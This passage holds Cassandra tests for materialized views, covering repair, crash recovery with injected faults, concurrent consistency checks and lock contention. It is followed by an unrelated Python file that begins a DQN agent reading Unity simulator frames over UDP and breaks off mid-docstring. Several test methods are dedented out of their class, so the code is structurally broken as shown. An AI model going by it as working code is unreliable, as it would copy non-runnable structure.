    node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
    node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
    node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
    self._replay_batchlogs()

    logger.debug('repairing base table')
    node1.nodetool("repair ks t")

    # insert data to the deleted partition with pk=2000, they should be considered dead
    # (written with a timestamp older than the partition deletion)
    session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
                    " VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
    self._replay_batchlogs()

    logger.debug('stop cluster')
    self.cluster.stop()

    logger.debug('rolling restart to check repaired data on each node')
    for node in self.cluster.nodelist():
        logger.debug('starting {}'.format(node.name))
        node.start(wait_for_binary_proto=True)
        session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
        for ck1 in range(size):
            for ck2 in range(size):
                if (
                        ck1 <= partition_deletion_ts or  # partition deletion
                        ck1 == ck2 or ck1 % 2 == 0 or  # row deletion or range tombstone
                        (ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10)  # range tombstone
                ):
                    assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
                                         "ck1={} AND ck2={}".format(ck1, ck2))
                    assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
                                         "ck1={} AND ck2={}".format(ck1, ck2))
                elif ck1 == ck2 - 1:  # cell tombstone: v2 is gone, the rest of the row survives
                    assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
                                        "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
                    assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
                                        "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
                else:
                    assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
                                        "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
                    assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
                                        "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
        # Verify partition deletion with pk=2000 has no live data
        assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
        assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
        logger.debug('stopping {}'.format(node.name))
        node.stop(wait_other_notice=True, wait_for_binary_proto=True)
@pytest.mark.resource_intensive
def test_really_complex_repair(self):
    """
    Test that a materialized view is consistent after a more complex repair.
    """
    session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
    node1, node2, node3, node4, node5 = self.cluster.nodelist()
    # create the base table with a small gc_grace_seconds so batchlog entries
    # expire quickly (NOTE: the code sets 1s, not the 5s an older comment claimed)
    session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
                    "WITH gc_grace_seconds = 1")
    session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
                     "v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    logger.debug('Shutdown node2 and node3')
    node2.stop(wait_other_notice=True)
    node3.stop(wait_other_notice=True)

    # These rows are only seen by node1/node4/node5.
    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
    self._replay_batchlogs()
    logger.debug('Verify the data in the MV on node1 with CL=ONE')
    assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
    self._replay_batchlogs()
    logger.debug('Verify the data in the MV on node1 with CL=ONE')
    assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
    session.shutdown()

    logger.debug('Shutdown node1, node4 and node5')
    node1.stop()
    node4.stop()
    node5.stop()
    logger.debug('Start nodes 2 and 3')
    node2.start()
    node3.start(wait_for_binary_proto=True)
    session2 = self.patient_cql_connection(node2)
    session2.execute('USE ks')
    logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")

    logger.debug('Write new data in node2 that overlap those in node1')
    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
    self._replay_batchlogs()
    assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
    self._replay_batchlogs()
    assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])

    logger.debug("Composite delete of everything")
    session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
    session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
    self._replay_batchlogs()
    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")

    logger.debug('Wait for batchlogs to expire from node2 and node3')
    time.sleep(5)

    logger.debug('Start remaining nodes')
    node1.start(wait_for_binary_proto=True)
    node4.start(wait_for_binary_proto=True)
    node5.start(wait_for_binary_proto=True)

    # At this point the data isn't repaired, so a QUORUM read (node1/4/5 form a
    # majority again) still returns the stale 'a' rows deleted on node2/node3.
    assert_all(
        session2,
        "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
        cl=ConsistencyLevel.QUORUM
    )
    logger.debug('Run global repair on node1')
    node1.repair()
    # After repair the deletions win everywhere.
    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
    """
    Test complex MV select statements
    @jira_ticket CASSANDRA-9664
    """
    cluster = self.cluster
    cluster.set_configuration_options({'enable_materialized_views': 'true'})
    cluster.populate(3).start()
    node1 = cluster.nodelist()[0]
    session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)

    logger.debug("Creating keyspace")
    session.execute("CREATE KEYSPACE mvtest WITH replication = "
                    "{'class': 'SimpleStrategy', 'replication_factor': '3'}")
    session.execute('USE mvtest')

    # Primary-key permutations of (a, b, c) to exercise for the same filtered view.
    mv_primary_keys = ["((a, b), c)",
                       "((b, a), c)",
                       "(a, b, c)",
                       "(c, b, a)",
                       "((c, a), b)"]
    # The table and view are created, exercised and dropped once per permutation.
    for mv_primary_key in mv_primary_keys:
        session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")

        insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
        update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
        delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
        delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
        session.cluster.control_connection.wait_for_schema_agreement()

        rows = [(0, 0, 0, 0),
                (0, 0, 1, 0),
                (0, 1, 0, 0),
                (0, 1, 1, 0),
                (1, 0, 0, 0),
                (1, 0, 1, 0),
                (1, 1, -1, 0),
                (1, 1, 0, 0),
                (1, 1, 1, 0)]
        for row in rows:
            session.execute(insert_stmt, row)

        logger.debug("Testing MV primary key: {}".format(mv_primary_key))

        # View filter: a = 1 AND c = 1 (b unconstrained).
        session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
                        "a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
        time.sleep(3)  # NOTE(review): fixed sleep presumably waits out the view build — confirm
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # insert new rows that do not match the filter
        session.execute(insert_stmt, (0, 0, 1, 0))
        session.execute(insert_stmt, (1, 1, 0, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # insert new row that does match the filter
        session.execute(insert_stmt, (1, 2, 1, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # update rows that do not match the filter (prepared order is d, a, b, c)
        session.execute(update_stmt, (1, 1, -1, 0))
        session.execute(update_stmt, (0, 1, 1, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # update a row that does match the filter (sets d = 2 on (1, 1, 1))
        session.execute(update_stmt, (2, 1, 1, 1))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete rows that do not match the filter
        session.execute(delete_stmt1, (1, 1, -1))
        session.execute(delete_stmt1, (2, 0, 1))
        session.execute(delete_stmt2, (0,))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete a row that does match the filter
        session.execute(delete_stmt1, (1, 1, 1))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete a partition that matches the filter
        session.execute(delete_stmt2, (1,))
        assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)

        # Cleanup
        session.execute("DROP MATERIALIZED VIEW mv")
        session.execute("DROP TABLE test")
def propagate_view_creation_over_non_existing_table(self):
    """
    The internal addition of a view over a non existing table should be ignored
    @jira_ticket CASSANDRA-13737

    NOTE(review): the name lacks the 'test_' prefix, so pytest will not collect
    it as a test — confirm whether that is intentional.
    """
    cluster = self.cluster
    cluster.populate(3)
    cluster.start()
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
    create_ks(session, 'ks', 3)

    session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')

    # create a materialized view only in nodes 1 and 2
    node3.stop(wait_other_notice=True)
    session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
                     'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
                     'PRIMARY KEY (state, username)'))

    # drop the base table only in node 3
    node1.stop(wait_other_notice=True)
    node2.stop(wait_other_notice=True)
    node3.start(wait_for_binary_proto=True)
    session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
    session.execute('DROP TABLE ks.users')

    # restart the cluster
    cluster.stop()
    cluster.start()

    # node3 should have received and ignored the creation of the MV over the dropped table
    assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
    """Crash-recovery scenario with the write failure injected *after* the view apply."""
    self._test_base_view_consistency_on_crash(fail_phase="after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
    """Crash-recovery scenario with the write failure injected *before* the view apply."""
    self._test_base_view_consistency_on_crash(fail_phase="before")
def _test_base_view_consistency_on_crash(self, fail_phase):
    """
    * Fails base table write before or after applying views
    * Restart node and replay commit and batchlog
    * Check that base and views are present

    @jira_ticket CASSANDRA-13069
    """
    self.cluster.set_batch_commitlog(enabled=True)
    # The injected 'Dummy failure' errors are expected; don't fail the test on them.
    self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
    self.prepare(rf=1, install_byteman=True)
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    logger.debug('Make node1 fail {} view writes'.format(fail_phase))
    node1.byteman_submit(['./byteman/fail_{}_view_write.btm'.format(fail_phase)])

    logger.debug('Write 1000 rows - all node1 writes should fail')
    failed = False
    for i in range(1, 1000):
        try:
            session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
        except WriteFailure:
            failed = True
    assert failed, "Should fail at least once."
    assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"

    # Before the restart/replay, some rows must be missing from base and/or view.
    missing_entries = 0
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')
    for i in range(1, 1000):
        view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        if not base_entry:
            missing_entries += 1
        if not view_entry:
            missing_entries += 1
    logger.debug("Missing entries {}".format(missing_entries))
    assert missing_entries > 0

    logger.debug('Restarting node1 to ensure commit log is replayed')
    node1.stop(wait_other_notice=True)
    # Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
    node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])

    logger.debug('Replay batchlogs')
    time.sleep(0.001)  # Wait batchlog.replay_timeout_in_ms=1 (ms)
    self._replay_batchlogs()

    logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')
    for i in range(1, 1000):
        view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
        assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
# Verdict for one verified read; the MM result classes below each carry one of
# these tags in their `mp` attribute. Members auto-number 1..5, matching the
# original explicit values.
MutationPresence = Enum('MutationPresence', 'match extra missing excluded unknown')
class MM(object):
    """Base class for read-verification results.

    `mp` holds the MutationPresence tag (set by subclasses); `out()` returns an
    optional diagnostic message, None when there is nothing to report.
    """

    mp = None  # MutationPresence tag; subclasses assign it in __init__

    def out(self):
        # The base result carries no diagnostic message.
        return None
class Match(MM):
    """Read result agrees with the expected base-table value."""

    def __init__(self):
        self.mp = MutationPresence.match

    def out(self):
        # A match needs no diagnostic message.
        return None
class Extra(MM):
    """The view returned a row, but its value differs from the expected one."""

    expecting = None  # value the base table holds (or -1 when absent); see thread_session
    value = None      # value the generator expected for this sequence number
    row = None        # the (a, b, c, d) tuple actually read from the view

    def __init__(self, expecting, value, row):
        self.mp = MutationPresence.extra
        self.expecting = expecting
        self.value = value
        self.row = row

    def out(self):
        return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
    """The base table holds the value but the view returned no row."""

    value = None  # the base-table value that should have appeared in the view
    row = None    # NOTE(review): the call site passes the sequence number i here — confirm naming

    def __init__(self, value, row):
        self.mp = MutationPresence.missing
        self.value = value
        self.row = row

    def out(self):
        return "Missing. At {}".format(self.row)
class Excluded(MM):
    """Row absent from both the base snapshot and the view — consistently excluded."""

    def __init__(self):
        self.mp = MutationPresence.excluded

    def out(self):
        # Nothing to report: base and view agree the row is gone.
        return None
class Unknown(MM):
    """Fallback verdict: the read matched none of the expected base/view combinations."""

    def __init__(self):
        self.mp = MutationPresence.unknown

    def out(self):
        return None
# Consistency levels used by the concurrent write/read verification below.
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
# One generated row for mvtest.test1: a = partition key, b = clustering key, c/d = values.
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
    """Deterministically map sequence number *i* to a SimpleRow spread over *num_partitions* partitions."""
    partition = i % num_partitions
    clustering = (i % 400) // num_partitions
    return SimpleRow(a=partition, b=clustering, c=i, d=i)
# Create a threaded session and execute queries from a Queue
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
    """Verify rows [start, end) against the view and push an MM verdict per row onto *queue*.

    *rows* is the base-table snapshot built by _populate_rows: {(a, b): c}.
    """

    def execute_query(session, select_gi, i):
        # Classify one row by comparing the base snapshot with the view read.
        row = row_generate(i, num_partitions)
        if (row.a, row.b) in rows:
            base = rows[(row.a, row.b)]
        else:
            base = -1  # sentinel: row absent from the base snapshot
        gi = list(session.execute(select_gi, [row.c, row.a]))
        if base == i and len(gi) == 1:
            return Match()
        elif base != i and len(gi) == 1:
            return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
        elif base == i and len(gi) == 0:
            return Missing(base, i)
        elif base != i and len(gi) == 0:
            return Excluded()
        else:
            return Unknown()

    try:
        # Each worker opens its own connection so reads don't share driver state.
        cluster = Cluster([ip])
        session = cluster.connect()
        select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
        select_gi.consistency_level = readConsistency
        for i in range(start, end):
            ret = execute_query(session, select_gi, i)
            queue.put_nowait(ret)
    except Exception as e:
        print(str(e))
    # NOTE(review): close() exists on multiprocessing.Queue but not queue.Queue —
    # confirm which Queue class is imported at the top of this file.
    queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
    """Verify base-table vs. materialized-view consistency under concurrent async writes.

    Writes are issued asynchronously against node2 while the view is created
    mid-stream; reads are then verified from worker threads (thread_session).
    @jira_ticket CASSANDRA-10981
    """

    def prepare(self, user_table=False):
        """Start a 3-node cluster with MVs enabled, reset counters, return a session to node2.

        `user_table` is accepted for interface compatibility but unused here.
        """
        cluster = self.cluster
        cluster.set_configuration_options({'enable_materialized_views': 'true'})
        cluster.populate(3).start()
        node2 = cluster.nodelist()[1]
        # Keep the status of async requests
        self.exception_type = collections.Counter()
        self.num_request_done = 0
        self.counts = {mp: 0 for mp in MutationPresence}
        self.rows = {}
        self.update_stats_every = 100
        logger.debug("Set to talk to node 2")
        self.session = self.patient_cql_connection(node2)
        return self.session

    def _print_write_status(self, row):
        """Log write progress plus a breakdown of async-write exceptions seen so far."""
        output = "\r{}".format(row)
        for key in list(self.exception_type.keys()):
            output = "{} ({}: {})".format(output, key, self.exception_type[key])
        logger.debug(output)

    def _print_read_status(self, row):
        """Log running match/extra/missing counters; add a 'WTF' column for unknown verdicts."""
        if self.counts[MutationPresence.unknown] == 0:
            logger.debug(
                "\rOn {}; match: {}; extra: {}; missing: {}".format(
                    row,
                    self.counts[MutationPresence.match],
                    self.counts[MutationPresence.extra],
                    self.counts[MutationPresence.missing])
            )
        else:
            logger.debug(
                "\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
                    row,
                    self.counts[MutationPresence.match],
                    self.counts[MutationPresence.extra],
                    self.counts[MutationPresence.missing],
                    # BUG FIX: was MutationPresence.unkown (AttributeError whenever
                    # any Unknown verdict had been counted); the member is 'unknown'.
                    self.counts[MutationPresence.unknown])
            )

    def _do_row(self, insert_stmt, i, num_partitions):
        """Fire one async insert for row *i*, tracking completion and failures via callbacks."""

        # Error callback for async requests
        def handle_errors(row, exc):
            self.num_request_done += 1
            try:
                name = type(exc).__name__
                self.exception_type[name] += 1
            except Exception as e:
                print(traceback.format_exception_only(type(e), e))

        # Success callback for async requests
        def success_callback(row):
            self.num_request_done += 1
            if i % self.update_stats_every == 0:
                self._print_write_status(i)

        row = row_generate(i, num_partitions)
        async_ret = self.session.execute_async(insert_stmt, row)
        errors = partial(handle_errors, row)
        async_ret.add_callbacks(success_callback, errors)

    def _populate_rows(self):
        """Snapshot the base table into self.rows so readers can check the view against it."""
        statement = SimpleStatement(
            "SELECT a, b, c FROM mvtest.test1",
            consistency_level=readConsistency
        )
        data = self.session.execute(statement)
        for row in data:
            self.rows[(row.a, row.b)] = row.c

    @pytest.mark.skip(reason='awaiting CASSANDRA-11290')
    def test_single_partition_consistent_reads_after_write(self):
        """
        Tests consistency of multiple writes to a single partition

        @jira_ticket CASSANDRA-10981
        """
        self._consistent_reads_after_write_test(1)

    def test_multi_partition_consistent_reads_after_write(self):
        """
        Tests consistency of multiple writes to a multiple partitions

        @jira_ticket CASSANDRA-10981
        """
        self._consistent_reads_after_write_test(5)

    def _consistent_reads_after_write_test(self, num_partitions):
        """Write 100k rows async (view created after the first 10%), then verify every read."""
        session = self.prepare()
        node1, node2, node3 = self.cluster.nodelist()

        # Test config
        lower = 0
        upper = 100000
        processes = 4
        queues = [None] * processes
        eachProcess = (upper - lower) // processes

        logger.debug("Creating schema")
        session.execute(
            ("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
             "{'class': 'SimpleStrategy', 'replication_factor': '3'}")
        )
        session.execute(
            "CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
        )
        session.cluster.control_connection.wait_for_schema_agreement()

        insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
        insert1.consistency_level = writeConsistency
        logger.debug("Writing data to base table")
        for i in range(upper // 10):
            self._do_row(insert1, i, num_partitions)

        logger.debug("Creating materialized view")
        session.execute(
            ('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
             'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
             'c IS NOT NULL PRIMARY KEY (c,a,b)')
        )
        session.cluster.control_connection.wait_for_schema_agreement()

        logger.debug("Writing more data to base table")
        for i in range(upper // 10, upper):
            self._do_row(insert1, i, num_partitions)

        # Wait that all requests are done
        while self.num_request_done < upper:
            time.sleep(1)

        logger.debug("Making sure all batchlogs are replayed on node1")
        node1.nodetool("replaybatchlog")
        logger.debug("Making sure all batchlogs are replayed on node2")
        node2.nodetool("replaybatchlog")
        logger.debug("Making sure all batchlogs are replayed on node3")
        node3.nodetool("replaybatchlog")

        logger.debug("Finished writes, now verifying reads")
        self._populate_rows()

        # One reader thread per slice of the sequence range, each feeding its own queue.
        threads = []
        for i in range(processes):
            start = lower + (eachProcess * i)
            if i == processes - 1:
                end = upper  # last slice absorbs any rounding remainder
            else:
                end = lower + (eachProcess * (i + 1))
            q = Queue()
            node_ip = get_ip_from_node(node2)
            t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
            threads.append(t)
            t.daemon = True
            t.start()
            queues[i] = q

        for i in range(lower, upper):
            if i % 100 == 0:
                self._print_read_status(i)
            try:
                mm = queues[i % processes].get(timeout=60)
            except Empty as e:
                pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
            # Log every non-match verdict once, then count it (out() was previously
            # called twice; computed once here).
            message = mm.out()
            if message is not None:
                logger.debug("\r{}\n".format(message))
            self.counts[mm.mp] += 1

        self._print_read_status(upper)
        for thread in threads:
            thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
    """
    Test materialized views lock contention.
    @jira_ticket CASSANDRA-12689
    @since 3.0
    """

    def _prepare_cluster(self):
        """Start a single node with write concurrency 1 and injected MV lock failures."""
        self.cluster.populate(1)
        self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
        # NOTE(review): this rebinds the helper method name with its boolean result;
        # a later call to self.supports_v5_protocol(...) on this instance would fail.
        self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
        self.protocol_version = 5 if self.supports_v5_protocol else 4

        # Minimal concurrency so writes actually contend on the MV partition lock.
        self.cluster.set_configuration_options(values={
            'concurrent_materialized_view_writes': 1,
            'concurrent_writes': 1,
        })
        self.nodes = list(self.cluster.nodes.values())
        # Test-only property: forces the first 64 MV lock acquisitions to fail,
        # exercising the retry path (see CASSANDRA-12689).
        self.cluster.start(jvm_args=[
            "-Dcassandra.test.fail_mv_locks_count=64"
        ])

        session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)
        keyspace = "locktest"
        session.execute("""
                CREATE KEYSPACE IF NOT EXISTS {}
                WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
                """.format(keyspace))
        session.set_keyspace(keyspace)

        session.execute(
            "CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
        session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
                SELECT int1, date, int2
                FROM test
                WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
                PRIMARY KEY (int1, date, int2)
                WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")

        return session

    @since('3.0')
    def test_mutations_dontblock(self):
        """Insert 100x100 rows concurrently and assert the MutationStage never backs up."""
        session = self._prepare_cluster()
        records = 100
        records2 = 100
        params = []
        for x in range(records):
            for y in range(records2):
                params.append([x, y])

        execute_concurrent_with_args(
            session,
            session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
            params
        )

        assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])

        # Despite the injected lock failures, no mutations may be left pending.
        for node in self.nodes:
            with JolokiaAgent(node) as jmx:
                mutationStagePending = jmx.read_attribute(
                    make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
                )
                assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
|
Dataset_Collect.py | import base64
import copy
import datetime as dt
import io
import os
import random
import socket
import sys
import threading
import time
from collections import deque
from net_builder import Data_dim_reduce as build_model
import numpy as np
import skimage
import torch
from torch.autograd import Variable
from PIL import Image
from skimage import color, exposure, transform
import cv2
EPISODES = 500  # training-episode budget
img_rows, img_cols = 80, 80  # network input resolution (see decode(): resize to 80x80)
# Convert image into gray scale
# We stack 8 frames, 0.06*8 sec
img_channels = 4  # NOTE(review): comment above says 8 frames but 4 channels are configured — confirm
unity_Block_size = 65536  # UDP receive size for packets from the Unity simulator
# PATH_MODEL = 'C:/dl_data/Python_Project/save_model/'
# PATH_LOG = 'C:/dl_data/Python_Project/train_log/'
PATH_MODEL = 'save_Model'  # checkpoint directory
PATH_LOG = 'train_Log'  # training-log directory
PATH_DATASET = 'dataSet_image'  # collected camera frames are saved under here
time_Feature = round(time.time())  # run id: startup timestamp, used to name this run's artifacts
random_index = np.random.permutation(img_channels)  # NOTE(review): not used in this chunk — confirm purpose
Data_Collect = True  # NOTE(review): presumably gates dataset collection; usage not visible here
class DQNAgent:
    """DQN agent: epsilon-greedy policy over a conv net, replay memory and a target network."""

    def __init__(self, state_size, action_size, device_):
        self.t = 0             # global step counter (stored with each replay entry)
        self.max_Q = 0         # latest max-Q value, kept for logging
        self.trainingLoss = 0  # latest training loss, kept for logging
        self.train = True      # False => pure exploitation (epsilon pinned to 0)

        # Get size of state and action
        self.state_size = state_size
        self.action_size = action_size
        self.device = device_

        # These are hyper parameters for the DQN
        self.discount_factor = 0.99
        self.learning_rate = 1e-4
        if self.train:
            self.epsilon = 1.0
            self.initial_epsilon = 1.0
        else:
            self.epsilon = 0
            self.initial_epsilon = 0
        self.epsilon_min = 0.01
        self.batch_size = 64
        self.train_start = 100
        self.explore = 4000  # steps over which epsilon anneals to epsilon_min

        # Create replay memory using deque
        self.memory = deque(maxlen=32000)

        # Create main model and target model
        self.model = build_model().to(self.device)
        self.target_model = build_model().to(self.device)
        # Initialize the target model so that the parameters of the two models are identical.
        self.update_target_model()

        self.optimizer = torch.optim.Adam(self.model.parameters(), lr=1e-4)
        self.loss = torch.nn.MSELoss()

    def process_image(self, obs):
        """Convert an RGB observation to grayscale.

        (A commented-out inverse-perspective-mapping prototype previously lived
